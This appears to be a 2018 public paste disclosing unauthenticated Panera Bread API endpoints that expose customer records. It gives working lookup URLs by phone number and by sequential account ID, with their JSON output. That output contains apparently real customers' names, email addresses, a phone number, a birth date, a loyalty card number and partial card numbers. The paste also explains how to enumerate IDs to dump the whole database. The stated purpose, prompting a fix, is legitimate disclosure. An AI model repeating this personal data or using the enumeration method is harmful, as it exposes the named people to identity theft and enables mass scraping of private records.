a guest
Apr 3rd, 2018
7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7

I'd like to report a security vulnerability in Panera Bread's web application. There is a publicly available, completely unauthenticated API endpoint that allows anyone to access the following information about anyone who has ever signed up for an account to order food from Panera Bread:

1. Username
2. First and last name
3. Email address
4. Phone number
5. Birthday
6. Last four digits of saved credit card number
7. Saved home address
8. Social account integration information
9. Saved user food preferences and dietary restrictions

Here are the API endpoints which you can use to verify this information:

1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000

This returns the following JSON:

{"accounts": [{"username":"denys","name":"romona ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@hotmail.com","name":"Marie Mulcahy","cardNumber":"********5527"},{"username":"fenrny@msn.com","name":"F B","cardNumber":"********7921"},{"username":"sabooky1@yahoo.com","name":"C Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorge Alcalde","cardNumber":"********6129"},{"username":"ktennister37@aol.com","name":"Kei Kino","cardNumber":"********6061"},{"username":"gettingbetter812@yahoo.com","name":"jan jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo ianello","cardNumber":"********8386"},{"username":"dblaperch@aol.com","name":"Deborah LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@optonline.net","name":"sadie bagnoni","cardNumber":"********5144"},{"username":"arsbreva@hotmail.com","name":"Marea needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONTESSA SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabeth forlenzo","cardNumber":"********7085"},{"username":"jue-95@hotmail.com","name":"juline G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise longua","cardNumber":"********0102"},{"username":"homestead19-86@msn.com","name":"Sandra Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}]}

Note that you can look up usernames/email addresses for Panera Bread accounts if you know the target's phone number. This returns the username/email address and last four digits of the saved credit card of every user who has ever signed up with that phone number.

2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194

This returns the following JSON:

{"customerId":7382194,"username":"abcascio@cox.net","firstName":"Anthony","lastName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23860763,"emailAddress":"abcascio@cox.net","emailType":"Personal","isDefault":true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber":"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":true,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":false}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":false,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"userPreferences":{"foodPreferences":[{"code":3,"displayName":"Low Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayName":"Reward Reminders & Expiration Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displayName":"Panera Bread Updates & Special Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressionCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions":{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]}

In this context, "7382194" is the user's account ID. Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can, rather than information about one specific person, you can simply increment through the account IDs and collect as much as you'd like, up to and including the entire database.

Hopefully they'll fix this if it gets enough attention.